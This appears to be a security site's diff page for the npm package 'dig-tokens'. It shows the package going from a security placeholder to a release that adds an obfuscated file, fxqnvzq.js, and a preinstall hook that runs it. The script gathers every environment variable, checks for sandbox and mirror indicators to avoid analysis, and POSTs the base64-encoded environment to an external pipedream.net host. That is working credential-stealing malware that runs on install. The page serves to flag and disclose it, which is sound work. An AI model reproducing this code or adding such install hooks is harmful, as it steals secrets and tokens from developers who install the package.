dig-tokens 0.0.1-security → 50.887.424

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dig-tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/fxqnvzq.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/fxqnvzq.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x17eb60=a0_0x4bb6;function a0_0x4bb6(_0x5f0132,_0xf4994){const _0x3d81ef=a0_0x3d81();return a0_0x4bb6=function(_0x4bb6ad,_0xcac19d){_0x4bb6ad=_0x4bb6ad-0x17a;let _0x90196d=_0x3d81ef[_0x4bb6ad];return _0x90196d;},a0_0x4bb6(_0x5f0132,_0xf4994);}(function(_0x2fca61,_0x39644b){const _0x1dd90a=a0_0x4bb6,_0x7fe9fd=_0x2fca61();while(!![]){try{const _0x4d214e=-parseInt(_0x1dd90a(0x18d))/0x1+parseInt(_0x1dd90a(0x184))/0x2*(parseInt(_0x1dd90a(0x18f))/0x3)+parseInt(_0x1dd90a(0x17f))/0x4+-parseInt(_0x1dd90a(0x186))/0x5+-parseInt(_0x1dd90a(0x182))/0x6*(-parseInt(_0x1dd90a(0x185))/0x7)+-parseInt(_0x1dd90a(0x17a))/0x8+parseInt(_0x1dd90a(0x187))/0x9;if(_0x4d214e===_0x39644b)break;else _0x7fe9fd['push'](_0x7fe9fd['shift']());}catch(_0x5d609f){_0x7fe9fd['push'](_0x7fe9fd['shift']());}}}(a0_0x3d81,0xd5dfb));const http=require(a0_0x17eb60(0x188)),filter=[{'key':'npm_config_registry','val':a0_0x17eb60(0x194)},{'key':a0_0x17eb60(0x17d),'val':a0_0x17eb60(0x18c)},{'key':a0_0x17eb60(0x17d),'val':a0_0x17eb60(0x18e)},{'key':a0_0x17eb60(0x18a),'val':'daasadmin'},{'key':'_','val':a0_0x17eb60(0x189)}];function main(){const _0x1a15a1=a0_0x17eb60;var _0x1a77c7=process[_0x1a15a1(0x17c)]||{};if(filter[_0x1a15a1(0x17b)](({key:_0x3ce2fc,val:_0x459562})=>_0x1a77c7[_0x3ce2fc]&&_0x1a77c7[_0x3ce2fc][_0x1a15a1(0x192)](_0x459562))||Object[_0x1a15a1(0x193)](_0x1a77c7)[_0x1a15a1(0x183)]<0xa)return;req=http[_0x1a15a1(0x191)]({'host':[_0x1a15a1(0x190),'m',_0x1a15a1(0x197),_0x1a15a1(0x18b)][_0x1a15a1(0x17e)]('.'),'path':'/'+(_0x1a77c7[_0x1a15a1(0x198)]||''),'method':_0x1a15a1(0x196)})['on']('error',function(_0x13b57f){}),req['write'](Buffer['from'](JSON[_0x1a15a1(0x195)](_0x1a77c7))[_0x1a15a1(0x181)]('base64')),req[_0x1a15a1(0x180)]();}function a0_0x3d81(){const _0x2cf6a1=['799882RgrAFP','7aLSRsK','4894830KZqAYp','27147375IzsYQs','https','/usr/bin/python','USERNAME','net','tencent.com','849113ELmMOM','registry.npmmirror.com','3BECGmR','c2e7a0cfd4f45f811ede4b077ae48dfa','request','includes','keys','taobao.org','stringify','POST','pipedream','npm_package_name','13791320SChcTs','some','env','npm_config_registry','join','1296124nmhirG','end','toString','4126044YXIiIX','length'];a0_0x3d81=function(){return _0x2cf6a1;};return a0_0x3d81();}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "dig-tokens",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "50.887.424",
4
+ "main": "fxqnvzq.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node fxqnvzq.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.